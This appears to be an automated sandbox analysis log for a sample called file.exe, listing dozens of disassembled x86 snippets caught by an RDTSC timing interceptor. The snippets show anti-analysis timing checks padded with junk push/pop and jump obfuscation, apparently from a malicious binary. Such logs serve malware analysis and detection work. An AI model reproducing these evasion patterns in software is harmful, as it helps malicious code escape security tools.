Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A833BE second address: A8342A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F0E6551CA42h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 add bl, FFFFFFC6h 0x00000024 mov di, bx 0x00000027 mov eax, dword ptr [ebp+122D01DDh] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0E6551CA38h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 adc ebx, 48EC3E00h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 jno 00007F0E6551CA38h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8243D second address: A82441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85791 second address: A857F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F0E6551CA3Ch 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0E6551CA38h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, 64C17C00h 0x00000033 or dword ptr [ebp+122D37D8h], ecx 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D1D02h], edi 0x00000041 mov ebx, dword ptr [ebp+122D22B6h] 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 jng 00007F0E6551CA38h 0x0000004f push esi 0x00000050 pop esi 0x00000051 pop eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82441 second address: A82468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0E647B6078h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E647B6085h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A857F1 second address: A857F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82468 second address: A8246E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8661D second address: A86621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A86621 second address: A86627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87703 second address: A87709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87709 second address: A8773C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F0E647B6088h 0x0000000e jmp 00007F0E647B6082h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E647B6081h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A6A0 second address: A8A6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A6A4 second address: A8A6AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A6AE second address: A8A6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A86837 second address: A868E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov dword ptr [ebp+122D39B1h], edi 0x00000012 pop edi 0x00000013 adc cl, 00000031h 0x00000016 popad 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F0E647B6078h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 or dword ptr [ebp+122D2042h], ecx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 add dword ptr [ebp+122D3C09h], ecx 0x0000004b mov eax, dword ptr [ebp+122D0E31h] 0x00000051 mov dword ptr [ebp+122D3575h], ecx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c call 00007F0E647B6078h 0x00000061 pop eax 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 add dword ptr [esp+04h], 0000001Dh 0x0000006e inc eax 0x0000006f push eax 0x00000070 ret 0x00000071 pop eax 0x00000072 ret 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 jne 00007F0E647B6085h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A868E1 second address: A868FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007F0E6551CA3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A868FC second address: A86904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A7E8 second address: A8A84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2B98h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+12460A65h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+122D59E8h], edi 0x0000002a mov dword ptr [ebp+122D2026h], esi 0x00000030 mov eax, dword ptr [ebp+122D16C5h] 0x00000036 mov bl, 19h 0x00000038 jmp 00007F0E6551CA45h 0x0000003d push FFFFFFFFh 0x0000003f movsx edi, si 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 push edi 0x00000046 pop edi 0x00000047 jl 00007F0E6551CA36h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A84A second address: A8A84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C7A0 second address: A8C848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E6551CA45h 0x0000000e popad 0x0000000f nop 0x00000010 mov di, 8F9Ah 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F0E6551CA38h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 call 00007F0E6551CA3Ah 0x00000037 jmp 00007F0E6551CA49h 0x0000003c pop edi 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push ebx 0x00000040 jmp 00007F0E6551CA45h 0x00000045 pop ebx 0x00000046 jmp 00007F0E6551CA40h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C848 second address: A8C84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B96D second address: A8B972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B972 second address: A8BA27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F0E647B6088h 0x00000010 pop edi 0x00000011 nop 0x00000012 pushad 0x00000013 sub dword ptr [ebp+122D2343h], eax 0x00000019 jp 00007F0E647B6076h 0x0000001f popad 0x00000020 push dword ptr fs:[00000000h] 0x00000027 jmp 00007F0E647B6088h 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov bl, 36h 0x00000035 mov eax, dword ptr [ebp+122D032Dh] 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F0E647B6078h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 push FFFFFFFFh 0x00000057 mov di, ax 0x0000005a mov bx, si 0x0000005d nop 0x0000005e jl 00007F0E647B607Ah 0x00000064 push ecx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0E647B607Bh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94966 second address: A9496B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9496B second address: A949BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6085h 0x00000007 jmp 00007F0E647B6084h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jne 00007F0E647B6081h 0x00000015 pushad 0x00000016 jmp 00007F0E647B607Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A941ED second address: A94211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E6551CA45h 0x0000000e jnc 00007F0E6551CA36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94211 second address: A9421B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9421B second address: A94221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94221 second address: A94225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94225 second address: A94229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94229 second address: A94234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94234 second address: A9423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9423C second address: A94255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E647B6080h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94255 second address: A9426C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA43h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A943A8 second address: A943AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36862 second address: A36866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36866 second address: A3686A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B5DD second address: A9B5EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B5EA second address: A9B602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0E647B607Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B602 second address: A9B60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E6551CA36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B60C second address: A9B610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B6A3 second address: A9B6ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F0E6551CA3Eh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ecx 0x00000017 jmp 00007F0E6551CA43h 0x0000001c pop ecx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B6ED second address: A9B70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6089h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B81B second address: A9B847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E6551CA42h 0x00000008 js 00007F0E6551CA36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jng 00007F0E6551CA48h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B847 second address: A9B84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B84B second address: A9B878 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d jmp 00007F0E6551CA47h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edi 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B878 second address: 8BEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop eax 0x00000007 js 00007F0E647B608Eh 0x0000000d jmp 00007F0E647B6088h 0x00000012 push dword ptr [ebp+122D0361h] 0x00000018 stc 0x00000019 cmc 0x0000001a call dword ptr [ebp+122D2034h] 0x00000020 pushad 0x00000021 jmp 00007F0E647B6086h 0x00000026 mov dword ptr [ebp+122D2273h], edx 0x0000002c xor eax, eax 0x0000002e jmp 00007F0E647B6083h 0x00000033 mov dword ptr [ebp+122D2273h], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F0E647B607Eh 0x00000042 mov dword ptr [ebp+122D2D98h], eax 0x00000048 jmp 00007F0E647B6088h 0x0000004d mov esi, 0000003Ch 0x00000052 clc 0x00000053 cld 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 jmp 00007F0E647B6086h 0x0000005d lodsw 0x0000005f jp 00007F0E647B607Ch 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a mov eax, 3F34A5C6h 0x0000006f mov dx, ECF7h 0x00000073 popad 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 stc 0x00000079 nop 0x0000007a pushad 0x0000007b jmp 00007F0E647B6084h 0x00000080 jns 00007F0E647B607Ch 0x00000086 popad 0x00000087 push eax 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b push ebx 0x0000008c pop ebx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CF44 second address: A9CF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33119 second address: A33123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34C68 second address: A34C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E6551CA36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34C76 second address: A34C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E647B6084h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA1841 second address: AA1852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0E6551CA36h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA1852 second address: AA1856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA1E06 second address: AA1E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA20A0 second address: AA20AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA20AA second address: AA20CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA43h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA20CA second address: AA20D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2212 second address: AA2218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2218 second address: AA221C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA221C second address: AA224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F0E6551CA3Ch 0x00000010 jo 00007F0E6551CA36h 0x00000016 jnc 00007F0E6551CA38h 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2524 second address: AA2540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6088h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2540 second address: AA254F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E6551CA36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA26BE second address: AA26C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA26C6 second address: AA26D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34CA4 second address: A34CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E647B6076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA8F58 second address: AA8F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA46h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA8F74 second address: AA8F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E647B607Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79C6 second address: AA79CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79CB second address: AA79DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79DA second address: AA79E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7C89 second address: AA7C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7C95 second address: AA7CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E6551CA3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7F57 second address: AA7F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA830D second address: AA8312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA88FC second address: AA8917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E647B6082h 0x0000000a popad 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA768E second address: AA76A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0E6551CA3Ah 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB08B2 second address: AB08BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF8A4 second address: AAF8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFB96 second address: AAFBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0E647B6076h 0x00000013 rdtsc
